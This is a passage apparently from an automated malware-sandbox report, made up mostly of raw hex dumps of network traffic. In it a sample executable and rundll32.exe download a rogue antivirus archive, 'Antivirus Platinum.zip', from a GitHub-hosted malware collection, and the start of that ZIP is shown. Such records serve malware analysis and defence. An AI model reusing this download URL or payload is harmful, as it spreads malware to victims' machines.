                                                                                                                                                            2022-09-29 12:45:02 UTC8841INData Raw: f6 f5 12 23 3f b9 e3 8f 06 54 5c c8 6c 4b 91 fe 85 e5 3e 5a c4 e2 4c 47 04 e0 41 99 8e eb 30 e5 26 4b 1a 2e 1b 56 34 80 8a ce af 62 e1 8e 0e d6 f3 0d 8a 72 82 6d 26 40 27 15 83 73 17 45 f2 20 15 9a 4e cd de 1e 22 15 08 42 37 e3 9b 5c 94 84 40 ef cb f8 fa 67 82 b3 df 9c 24 c5 73 a1 1e 6e d2 32 3d 46 43 b3 2b 9c 39 66 59 55 b2 e0 59 e1 e5 92 bf b9 a9 74 97 51 b7 96 8b 63 65 40 78 ed c2 33 e1 1b fa 37 f2 05 42 9b be db 1d e0 19 27 cb ff fb d6 ef 2d 05 10 00 20 14 71 7e c7 e3 1e e6 2b 1b 30 3c 70 79 1e e6 d9 a9 18 f6 01 ee 9d aa 38 31 b7 b1 ab f6 df 81 9e 8e ef 78 23 4a 87 26 d8 9f 39 6c 8b 9c cf 65 f3 30 00 b7 f2 4d 59 15 45 3c 96 9b a8 ba f2 fb e7 a4 15 84 6b 25 89 3e 27 60 cc 35 0e 95 6f ea a8 64 ea cf 3a 84 11 67 8b 37 12 9c 0c 6c a9 d3 ea 5c cf ad 67 f5
                                                                                                                                                            Data Ascii: #?T\lK>ZLGA0&K.V4brm&@'sE N"B7\@g$sn2=FC+9fYUYtQce@x37B'- q~+0<py81x#J&9le0MYE<k%>'`5od:g7l\g
                                                                                                                                                            2022-09-29 12:45:02 UTC8857INData Raw: 0d 22 34 fb 25 65 7f 31 b1 26 91 41 7e 2b 88 9e 90 3c e9 59 16 6e 17 75 7f 63 9d a7 9d e7 24 b0 c2 59 95 e7 ec 51 a7 ab 20 49 2d 0f 45 0e 8e 4b c0 59 99 3d a5 d0 cb 3e 95 af 43 6d f0 c7 b1 be 82 0a 2d dd a5 6d a7 2e e4 8d 40 3f 47 f8 4e 87 54 51 ec 85 a1 d5 5e 50 eb b4 8b fa d7 e2 e0 21 ed 97 96 15 48 9f 4c 06 1f b5 c6 6e 1b cf 55 6f 13 0a f5 a8 78 99 3c f7 e5 bd ec a4 40 0f d9 bf d9 c0 a4 69 1e 54 b7 95 69 67 3e 54 28 75 3e 6b 8c 0a 7c 84 9d 4e 8a 6f a3 ab 77 3b 1c 4a 30 ef 14 d3 0b 14 c5 25 c2 68 d9 fd 2d 9c 5e 03 98 57 94 78 c5 20 12 cd 17 f0 27 cc 8b 52 26 e4 a9 58 d5 f4 aa d1 51 04 c6 51 42 bb 01 9a d3 60 00 5b be e4 1f a4 29 4b 70 ce 2f e4 36 69 97 11 33 28 48 e8 9f cd b3 bb d4 a5 b3 3c 03 c6 23 1a 62 56 88 f2 a6 80 65 56 f8 10 19 50 8e 5e 10 f9 c6
                                                                                                                                                            Data Ascii: "4%e1&A~+<Ynuc$YQ I-EKY=>Cm-m.@?GNTQ^P!HLnUox<@iTig>T(u>k|Now;J0%h-^Wx 'R&XQQB`[)Kp/6i3(H<#bVeVP^
                                                                                                                                                            2022-09-29 12:45:02 UTC8873INData Raw: 3b c0 f7 1b bb 16 c8 63 11 61 65 42 15 72 4d 1e b5 2b 13 85 db 71 ce 0d fb 13 0f ca 9d dc ae e0 fd 59 83 3f e9 f7 a6 70 59 7d fa 59 b3 9c 8c 34 b6 9e cc 18 8a 7e 72 35 20 03 18 7a f0 b0 94 d6 13 20 2a 3e e6 22 25 d9 21 af 87 ca 96 cd d0 b4 9d f1 3d 14 37 50 c7 48 60 a2 c9 2d c9 20 d6 07 bf 42 b6 6b fa f2 e9 5e f3 80 ea 55 91 e8 cd 80 8f 41 e4 42 33 95 9e 3d 76 82 9e 7b 4f 0c f9 83 5f c2 e1 83 66 4d 81 6c 8c 40 04 83 4a cc 6c 16 12 fc 77 1b f1 9b 71 59 c1 d8 3e 7e 43 48 75 f2 bb 0c 6d ff 0e 06 d6 4f d2 2d 2f 38 38 64 1b 7b 72 18 d2 ca 69 0f e0 8e 4d 53 22 8b 44 31 7d 71 6a f3 80 3a 07 a6 3c 80 1a 22 d3 9d 88 72 15 92 a3 b7 aa 77 de c8 fc 32 e7 dc db 3e 62 fc b0 1e 6b 95 00 cc 93 50 1b bb e8 d8 ce 70 2b 31 40 12 3a 1e 9f c5 f4 0e 7f 37 b5 34 14 1b 57 d0 b1
                                                                                                                                                            Data Ascii: ;caeBrM+qY?pY}Y4~r5 z *>"%!=7PH`- Bk^UAB3=v{O_fMl@JlwqY>~CHumO-/88d{riMS"D1}qj:<"rw2>bkPp+1@:74W
                                                                                                                                                            2022-09-29 12:45:02 UTC8889INData Raw: ee 01 40 c3 89 a1 e5 a4 63 86 4e f9 fa 10 5b 8d 49 2a 94 bd 2a dc 7b 2f f5 e2 66 15 6e 4b fe e2 3b 30 6d c0 a5 b2 d1 36 a4 29 50 41 61 8e 84 e3 00 54 44 1e c8 a7 23 6b 30 1c bd 93 0f c6 6f 6f b4 65 ec 24 49 5a 9c c0 ec 61 88 6c 85 3f 9f 52 61 a7 c1 74 92 6a e3 b9 c3 29 70 49 a0 86 b2 19 62 f6 78 ce 88 dd 34 51 55 d8 db 73 af 67 e1 29 1e 4c e1 d6 ff 17 3f 3a c0 00 50 ee 06 06 d2 eb a0 6f 89 40 1a 2b c9 24 0e 48 07 3e f2 c9 40 06 4c f0 28 1d 9e 32 9b 61 aa a3 b0 1c f3 c3 88 41 b6 85 18 5f cd 0f 3e e9 0f 2b 8b 3a ac 69 53 02 db d7 d4 ba f3 dd 83 22 b1 cf 68 ab 3c 20 59 93 88 92 ee 29 f3 d7 97 c3 3f 65 95 ff 2b 7d c4 a1 27 5a 85 5a e7 31 e0 54 c1 b5 15 31 e4 d9 52 68 59 8b 41 7e 67 bb 1f 16 cc bd ff 09 cd ba 4d f2 65 9f cf 51 97 1f 3e c7 51 11 e0 03 92 2b 9a
                                                                                                                                                            Data Ascii: @cN[I**{/fnK;0m6)PAaTD#k0ooe$IZal?Ratj)pIbx4QUsg)L?:Po@+$H>@L(2aA_>+:iS"h< Y)?e+}'ZZ1T1RhYA~gMeQ>Q+
                                                                                                                                                            2022-09-29 12:45:02 UTC8905INData Raw: b7 45 c9 30 fa a8 fd b5 b7 3c ba 59 2e 7d 44 43 0c 27 db e0 7f 2f 83 4c 5a 5d 07 e7 42 37 22 87 0b ea 69 46 20 39 6b 44 8b f4 07 a1 f2 cb c1 4b fc 8d bf 4b bd 95 01 97 31 68 a4 f2 7e 6d 91 17 8f 8e 8f 70 46 7a db 69 f4 a1 08 0e d9 18 93 42 a2 ce 40 77 4b 8a d4 4d 8c 50 15 e5 01 c9 b2 1e 66 67 1e 31 3f 40 77 80 01 11 73 70 cd e4 11 15 fe 59 43 17 b0 01 57 cc c1 af 9c ee 65 44 a3 b6 8b a4 6f a3 65 0b a0 3c a7 e6 98 25 d9 53 1a 84 b0 9b d5 ab 24 2b d2 91 91 d9 b5 a1 59 33 23 e4 96 3f 01 19 8e 79 18 c1 18 22 bb d9 94 db b9 8a 3f 1a 50 b4 19 d5 56 1b aa da 53 bb 3f 22 86 8f 2d 16 ea a4 69 92 f1 56 32 30 4a dc ae f7 1c e7 2f 53 3e 07 98 de 5d 5e 35 e9 0b 00 0c 91 b0 8c 47 51 5d fb 09 a8 03 1e d1 7d be d8 0b 02 e7 ac 0f e8 50 99 14 1d 25 21 fe 69 c3 99 90 71 50
                                                                                                                                                            Data Ascii: E0<Y.}DC'/LZ]B7"iF 9kDKK1h~mpFziB@wKMPfg1?@wspYCWeDoe<%S$+Y3#?y"?PVS?"-iV20J/S>]^5GQ]}P%!iqP
                                                                                                                                                            2022-09-29 12:45:02 UTC8921INData Raw: 4d 7d 9f 08 ec bb d1 98 1a 45 04 60 b9 9b f5 f9 35 fc 29 d8 ed 65 b7 6f 0f 17 4e 8c b5 63 c6 e3 07 0b 43 f8 b7 1c c3 cd 87 2c a1 6a 14 c9 17 23 5b 83 62 d5 e8 4c 39 da fa 91 29 70 62 05 95 80 6c 7f 65 a6 63 21 95 32 a1 8f 87 89 3b 96 a4 99 c3 a4 66 16 1b 1b ca a3 4c 8d bf 39 5b 89 0e 7a 72 a7 3f 7b ed 86 2a 2c 21 3f b5 36 33 cf 4f 1d 8e 83 7e 85 d0 8d 6d dc 0d 2c a4 cd a9 1b c1 31 0c 5a 54 c6 6a 6e 4a 50 85 a7 0a e2 ab 7b 65 3c 39 47 1b 1f 83 92 53 bb 40 c4 1d ef 3e 58 41 83 ef 05 42 ba d0 c4 13 2e a5 ec 16 dc 6a ec d3 c6 59 3b e2 f1 92 fc 75 17 f3 2d 8c 4f ea 15 55 bf 05 59 3f aa 7b 48 03 23 a3 bd 9c 5f d8 c5 07 07 23 6a 98 3a 1d a6 c9 70 bf 2f fb 33 c8 47 1b 1e 46 a1 5d 65 b8 b8 4f 34 5a 2d a9 f1 b6 e4 78 5d 2b fc 88 c3 75 cd a6 38 17 cc 2b 61 ee 6a da
                                                                                                                                                            Data Ascii: M}E`5)eoNcC,j#[bL9)pblec!2;fL9[zr?{*,!?63O~m,1ZTjnJP{e<9GS@>XAB.jY;u-OUY?{H#_#j:p/3GF]eO4Z-x]+u8+aj
                                                                                                                                                            2022-09-29 12:45:02 UTC8937INData Raw: b9 7d a5 9a e0 a2 e1 ed b7 82 57 ce 55 ce 73 06 81 7a 05 6c 66 94 88 b7 6e 54 94 4a 0b 12 8d ea ec 65 1c 2e 59 e0 5e 09 31 ac c5 24 24 e7 33 69 eb 89 52 c7 c5 de 89 c4 19 25 1a ae 32 44 9d 9a 69 b2 01 f7 5b f2 fb 46 49 51 e2 ef b1 67 8e c0 0d 49 dc c9 4e fc f8 fd 3f cf e5 5c 23 a5 61 af b7 da c8 e1 c2 80 24 ea 08 11 41 98 2e 1e 2a 85 50 ba 2b 94 83 2a af 78 09 e3 05 ce a6 d5 e3 bb 95 13 8a 6a 47 62 c2 1c ec 70 3f 16 2c 7c 8c c2 7e cd 87 68 3a 9d 0e f0 ac 1d 3a bf eb 3d 17 94 8f 35 2a ec 5a c0 e7 c0 55 d0 74 46 b5 cb be 85 34 c6 23 a1 9f ea 72 05 6e 3f f2 b4 5c 58 63 6d 02 30 1d e6 cc 69 af 04 a6 ef 5a 6c 65 f6 1e 16 29 a6 a9 22 a7 b2 0f 72 da e4 23 7f e1 1a b1 b2 b9 29 47 1e cb a5 b6 4d bb f9 4e bf 2d 79 08 0b 40 da 9b ed 45 4f f0 6e 4c cc 89 d6 91 73 0b
                                                                                                                                                            Data Ascii: }WUszlfnTJe.Y^1$$3iR%2Di[FIQgIN?\#a$A.*P+*xjGbp?,|~h::=5*ZUtF4#rn?\Xcm0iZle)"r#)GMN-y@EOnLs
                                                                                                                                                            2022-09-29 12:45:02 UTC8953INData Raw: d4 15 1f 98 45 82 05 9e 27 29 20 5d c9 55 04 77 5e 05 03 5a bb 16 73 78 fb 27 c7 7c 04 d3 28 2d 07 70 c9 88 c0 eb 78 ab 18 48 85 f6 16 2b 1b 59 f8 33 de 6c 9f 37 c2 b5 a7 65 88 6b cb d8 3f 7e 8e 3e 4d 61 29 50 7a 81 71 00 f4 57 29 93 37 76 65 f9 d3 86 e5 dc 2a 26 16 d9 4c 52 4d c6 e1 94 85 06 09 30 67 b7 be 18 d6 68 a0 13 2d ff b0 69 c2 16 11 d2 1e 67 98 4e 58 04 b3 31 4b bc d6 62 a0 08 6f ce 77 f4 41 be d8 a9 2c 92 89 a8 83 72 d9 b7 3c 8a 04 7f f2 07 b9 ab 73 0f 15 9f 45 9e 06 80 08 61 fa 11 26 27 92 a1 99 30 c6 0d f7 b1 49 22 0d ce af d2 e5 96 ed e6 e2 d2 ad bb f7 1e b3 cb 48 a0 c5 98 ee 82 41 35 66 0e 69 da b9 46 08 1c 25 3f 1e 03 7c c5 26 18 f5 ac 8f 2b 58 31 1c 8a 16 69 22 18 7e 0c e7 91 b6 21 3a c3 d6 6d c5 d3 5e 62 8f 0b 06 ff 70 d1 67 4f 4d 8a 74
                                                                                                                                                            Data Ascii: E') ]Uw^Zsx'|(-pxH+Y3l7ek?~>Ma)PzqW)7ve*&LRM0gh-igNX1KbowA,r<sEa&'0I"HA5fiF%?|&+X1i"~!:m^bpgOMt
                                                                                                                                                            2022-09-29 12:45:02 UTC8969INData Raw: e8 a9 57 8c 33 75 27 60 6e b7 04 eb f7 9c 26 09 45 2b ae 61 e2 31 65 d4 31 78 a8 2b 48 6e 1c 7c 39 87 25 8d 9c 0f 67 4d 61 8e 81 f6 0a 53 b3 0c e9 93 4e bd 56 e2 e1 2c e0 ba 70 48 84 5b 30 17 68 c4 d4 1b 1f e4 c3 82 4c 0e 18 1c 38 c6 31 06 6b 59 55 97 b7 46 5c 4e d4 05 6d db 68 c6 3c cf d5 26 16 6d 5f 74 2e 8b 5f e0 a9 8a 6a 81 b3 c9 2f 42 2f 39 2e 7b 0e 23 0a 15 1a fd 83 d8 f8 95 07 73 42 94 27 05 c7 ba d7 d4 f7 c9 44 5a eb ef c6 45 34 83 1a 7a ca 22 73 c8 26 3e 73 1d 12 6e 75 36 af dd cc 54 45 9a a1 61 e6 ec 81 51 48 c0 19 43 30 3b c5 f3 b2 f8 e1 e9 f8 2d 04 6d 58 14 e5 c4 42 9d c5 62 96 eb b2 a0 b4 95 be 99 1c f4 58 cf c9 27 77 9d 24 00 66 1f cd 6c 52 d6 02 b4 ba 76 40 a2 71 c7 88 a9 c9 14 fc 5b e9 1d 09 a0 be 48 e5 a3 7d 63 a0 43 a9 b1 07 8b 50 1a 58
                                                                                                                                                            Data Ascii: W3u'`n&E+a1e1x+Hn|9%gMaSNV,pH[0hL81kYUF\Nmh<&m_t._j/B/9.{#sB'DZE4z"s&>snu6TEaQHC0;-mXBbX'w$flRv@q[H}cCPX


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            62192.168.2.649739140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:02 UTC8981OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            63140.82.121.4443192.168.2.649739C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:02 UTC8981INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:20 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:02 UTC8981INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            64192.168.2.649740185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:02 UTC8983OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            65185.199.110.133443192.168.2.649740C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:03 UTC8983INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 716432
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "2dd2f92f25598d9ce7015fc31af79216c3c4239d1c9016d16e6d1fa2f0f83264"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 98A4:E4BD:C06779:CC85EC:6335934E
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:02 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6922-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455503.809579,VS0,VE180
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 6fe8320881fa59cc9b47808046323e64d694bec3
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:02 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:03 UTC8984INData Raw: 50 4b 03 04 14 00 01 00 08 00 c3 50 3e 3c b9 dd 88 28 ca ed 0a 00 85 8f 0b 00 20 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 6c 61 74 69 6e 75 6d 2e 65 78 65 23 1e 4a 14 b1 c4 33 c0 bf 0b ce 01 66 9f a5 a5 fa 94 f3 86 ac 9e 88 9a 72 b7 c5 19 87 bb cc 9c ad 47 32 5b 58 17 8d f5 34 86 d9 16 0f 1c 15 31 7c f1 f6 a3 28 84 c7 dc a1 f4 c8 8e 5a 47 34 b7 d2 b8 58 d0 bd f6 1b 49 18 ba 76 bd e0 c6 eb d6 88 07 41 61 a6 35 34 e4 79 45 10 d7 8c b1 11 4d 68 47 d2 c1 27 14 da 92 65 60 d5 ea 14 a7 93 d9 26 ca 0b ef 17 54 58 41 5c c0 93 12 f1 e2 1b c2 d6 22 7b 35 0e 1d 96 da 55 71 44 a7 69 e1 48 a3 86 1e 19 14 ce cb 01 66 c0 fa c6 d4 f4 c3 8a 40 79 22 00 7d 7b 9e fe b1 e5 df 95 75 bf 90 e9 ea 8d 0d 25 96 56 2f 74 1f d9 2b df 87 3d f2 83 9f 41
                                                                                                                                                            Data Ascii: PKP><( Endermanch@AntivirusPlatinum.exe#J3frG2[X41|(ZG4XIvAa54yEMhG'e`&TXA\"{5UqDiHf@y"}{u%V/t+=A
                                                                                                                                                            2022-09-29 12:45:03 UTC8985INData Raw: d6 91 16 40 38 9a 03 50 65 14 d6 f4 31 a6 4f 62 26 3a 38 d4 6a 23 a8 b9 3f 34 c1 e5 aa 78 5c a6 2b 5e d3 1f 5f c6 e2 2a 02 35 de be 8e b6 2d bc 4b 18 21 9a b6 cc 94 e8 c9 8e 16 d7 f8 89 e3 5b 7a 98 34 6c 90 b5 af 54 91 64 d2 90 d9 c5 0d 09 e0 35 05 89 27 e9 c1 0a 5e ed 49 b6 6d 41 51 c2 ce e5 25 e9 3c 37 9e c7 3b 08 cd d5 4c c7 4c d1 eb c5 61 72 2a c4 d7 67 f1 1f 29 3f a8 7f 25 6b 6c 3e 42 f7 37 b1 49 90 88 a4 59 ca 48 10 60 08 fa 2b 61 43 dc 06 e7 e9 18 6d e3 04 1a 7c 2c ab 87 79 b6 62 98 82 b2 e8 85 ad 55 65 d9 67 05 a6 9a 59 53 70 4b 03 41 47 69 c3 39 97 c0 de 70 fd eb 76 ec 99 f0 c1 32 7a d8 33 f7 1d 42 76 2d 3c 34 e9 62 b3 24 db 98 ec f1 9d c7 1e be d0 96 d8 6b 31 59 6a e8 90 70 10 8a e9 33 50 9d f8 05 a9 99 bf 99 2d 97 c0 1e f9 3c 07 19 fb e9 c9 2d
                                                                                                                                                            Data Ascii: @8Pe1Ob&:8j#?4x\+^_*5-K![z4lTd5'^ImAQ%<7;LLar*g)?%kl>B7IYH`+aCm|,ybUegYSpKAGi9pv2z3Bv-<4b$k1Yjp3P-<-
                                                                                                                                                            2022-09-29 12:45:03 UTC8987INData Raw: 92 ed 66 93 ab 89 19 02 28 4e 67 0c 1d 58 a5 52 79 d8 ba 75 1b fd 3c 8d b8 70 ce a9 04 c9 fd 91 a4 05 21 bd c5 6c f1 67 56 c4 17 b5 6b 73 26 7e b8 26 13 00 d3 75 79 da cc e4 d4 a1 9e c7 6e 3e 6b 96 e8 19 f4 b1 3f 0b 94 24 60 98 c1 fd 93 22 b8 f4 00 29 c1 71 d7 4f 5d 78 ca c9 b5 53 9f 7d 56 fd a8 ca ff 1e 46 dc b5 48 22 80 f4 68 ef f1 32 b4 61 fd ca 0c 46 8b c5 a5 1b 17 42 df 18 2f 14 f2 6b 5c ac 68 3e 41 fc 46 7d a3 f1 a5 56 3d 7c e4 e5 e8 45 88 16 04 d6 ac d2 40 7e 2d 44 d7 4e 17 9a 67 62 2d a7 1a 98 64 17 82 85 4d 5d 18 41 46 a4 1c 12 44 b9 89 d4 41 19 b6 89 7e c4 40 22 b4 57 f0 79 0d c9 ff 22 d0 06 6e 67 a1 41 93 58 4a d7 83 d5 78 94 bc fe f6 d8 ee 11 63 f4 89 93 d8 53 99 b9 8a 5f c1 6c 93 bd 0b e2 25 3a 6a c8 a0 77 f4 1f b6 71 ff be cd fc 40 d7 12 9b
                                                                                                                                                            Data Ascii: f(NgXRyu<p!lgVks&~&uyn>k?$`")qO]xS}VFH"h2aFB/k\h>AF}V=|E@~-DNgb-dM]AFDA~@"Wy"ngAXJxcS_l%:jwq@
                                                                                                                                                            2022-09-29 12:45:03 UTC8988INData Raw: 6d 56 f9 64 2a e2 2c 0d 16 dc 2e 0d ac bd 2c 69 ca 32 8b 32 bd c2 0a 88 31 ec 3d 80 38 4d 33 d1 b8 6d 73 75 61 a2 40 db 4f a0 fe e9 63 e8 67 3a f2 9f bd ae 1b f0 8b 9c ee ef a6 4e 87 c0 2d 78 d6 5c 99 f8 8f b9 28 bd 49 f2 c2 61 e3 8c 26 79 42 49 d5 60 06 25 a1 9b a2 da c9 67 72 1f 1c f0 c9 b9 13 ba 89 2d 93 1d 5f 70 fd 89 c0 ca b1 94 0f 54 b4 92 df 3a a5 ab 7f 82 7e d8 cb 7e 14 40 a0 91 a6 3d 2c 40 d4 f3 e7 ed 7c d9 7e d7 cd 62 e6 9a 77 b6 eb b9 ac d9 4b 2e 33 42 1b ba ea c5 28 67 38 ce be a9 54 84 72 50 69 d8 b3 63 61 c4 b2 83 2c a1 5b ce 1b df e8 da 48 a7 79 a6 05 4f 9f c0 34 76 1b 13 5f 0d 21 4f db 32 94 bc de 8d a1 70 63 45 b4 ea 5b e1 26 84 df 37 a0 33 d3 5d 31 3b 80 29 1d 38 ba 29 3c cc 01 fe 29 9a ec b1 ab f3 50 3c 86 66 f7 34 1d 8e 34 74 43 e9 0d
                                                                                                                                                            Data Ascii: mVd*,.,i221=8M3msua@Ocg:N-x\(Ia&yBI`%gr-_pT:~~@=,@|~bwK.3B(g8TrPica,[HyO4v_!O2pcE[&73]1;)8)<)P<f44tC
                                                                                                                                                            2022-09-29 12:45:03 UTC8989INData Raw: 70 9a 0a 7a c1 27 30 25 23 a4 78 2a b6 90 60 7d b0 2c 06 71 5c a7 a3 84 6d db ec bd 0f 71 f1 7f 1c da 59 1e 42 a5 26 89 02 80 bc 29 de a2 33 5b bf 33 02 de 53 4f 5a 19 f3 94 01 a5 ed 70 c5 1b f8 1d 93 8b 0c b8 8f b0 55 c1 40 bd f0 9a cc 5c 57 ea 01 b4 2c 09 3c ba df 1a 8c a3 b7 30 cf 9b 2f 14 68 46 24 6e 26 91 5c d2 e1 4c ab e3 aa 6f a3 e8 fa a6 2f 72 bf 86 d7 6c 1f 16 10 af d4 ad f2 33 23 c8 87 93 75 a5 7c af af d0 31 0f 6b 04 4f 73 3f 9f 9d 05 0a e9 08 ba 36 cc c4 ac 08 39 4b 80 7a e3 aa 84 12 36 65 37 ef 74 75 de 8b cb 43 16 ef e1 79 e1 d8 2b a5 57 c4 c4 36 a3 f3 2c 52 ce c0 f1 a4 45 95 c5 61 8d de b1 67 1c 60 6c d0 4e 3c e0 e7 52 6f 6d 3f cc 07 ab fe 49 f1 94 d9 f2 50 02 e1 4a 84 1f f2 28 8d 27 03 2e 31 ad eb 44 2c 56 70 24 75 1d 32 6c ff a4 76 4e dd
                                                                                                                                                            Data Ascii: pz'0%#x*`},q\mqYB&)3[3SOZpU@\W,<0/hF$n&\Lo/rl3#u|1kOs?69Kz6e7tuCy+W6,REag`lN<Rom?IPJ('.1D,Vp$u2lvN
                                                                                                                                                            2022-09-29 12:45:03 UTC8991INData Raw: 57 10 83 0b 76 f9 4a 3f df 92 8b a1 fa 0e cb af 26 23 9a 9a 01 03 23 a5 c1 8c 89 ca e1 4e 51 e3 b0 92 60 dd cf 23 2b 3a 58 21 7b 53 b0 30 b9 69 56 c9 72 e6 91 32 4f 11 42 f6 18 79 15 5a b7 f4 90 62 bf 40 98 fe ff 32 d7 58 43 a5 16 b4 c5 d4 1e 45 d0 0d 55 e3 90 3a f1 4b be e8 5c 76 24 86 cb 5d 59 32 92 d7 55 ae a8 d2 ee 84 4e 00 1a 90 11 99 45 63 95 b7 2d 70 83 1e 0d af 70 fe 4b 79 70 5b a4 27 5f 81 59 69 55 11 cb c9 06 77 47 04 cd 31 8b 67 14 f5 4e dc 27 54 7a 91 12 17 ea a9 e9 da 8f c8 70 dd d3 b5 f1 a6 11 24 a7 37 0d 9d e8 9a df ea 0f d4 20 28 a9 c6 75 0a 3d 4f 9d 79 84 d0 fc 73 2a f8 a7 39 46 0e a4 26 65 8b e1 89 44 b3 5e 10 ad bc 12 7e ee f8 e2 ba 74 70 36 73 2c fe 98 4b 85 e0 67 4f 3b d4 e7 1d a2 02 22 16 0c d4 86 ce a1 f7 33 0a 6c 2c 64 0a 8e 72 4b
                                                                                                                                                            Data Ascii: WvJ?&##NQ`#+:X!{S0iVr2OByZb@2XCEU:K\v$]Y2UNEc-ppKyp['_YiUwG1gN'Tzp$7 (u=Oys*9F&eD^~tp6s,KgO;"3l,drK
                                                                                                                                                            2022-09-29 12:45:03 UTC8992INData Raw: a7 74 d9 e0 c2 6d c2 cb 5a d5 9a ce c9 65 94 1e 86 2e e5 f7 49 90 5a c5 65 1c fa 44 8b f3 03 b1 d9 33 07 ab 60 93 88 fe 11 4f 43 95 6b e1 61 8a 6c 65 52 61 54 dd 9f 11 b3 3c d7 dd 34 08 3b bd 2b 8b ef eb 5d de 88 a1 09 53 82 66 a8 22 24 46 e7 f4 df 0f 5a 5f 10 8f 8a d2 00 de 88 02 2f 6f f8 a7 a0 2a 9b 0d 1a 28 cb 66 b6 4b 4e 23 e8 0d b3 f8 83 24 87 c8 26 20 42 3e 75 9c d4 1f 44 32 b6 15 c2 45 40 c7 fa 89 c0 80 19 bc f2 c2 f1 e0 6f 9d 3f 1a df 6a 1d 7f f5 cb 03 24 a1 21 57 1f 89 ae bf 65 fa 95 16 0c 8f b6 63 3a a0 11 70 1b 61 7d 40 4e a1 dc fb 19 19 8a 88 c1 b5 dc 26 c6 2a ad 7b 5c ee 9f e0 12 f4 12 db 17 e1 a7 cd 11 a1 7b 10 84 87 35 ad 9f 56 d0 53 42 40 00 05 3b ff 62 6c 21 2e 7e a7 d3 8c 67 69 f3 47 5d 1a c2 23 d9 99 10 83 7f 6a 3d a5 cd 4a 89 ed cb 2d
                                                                                                                                                            Data Ascii: tmZe.IZeD3`OCkaleRaT<4;+]Sf"$FZ_/o*(fKN#$& B>uD2E@o?j$!Wec:pa}@N&*{\{5VSB@;bl!.~giG]#j=J-
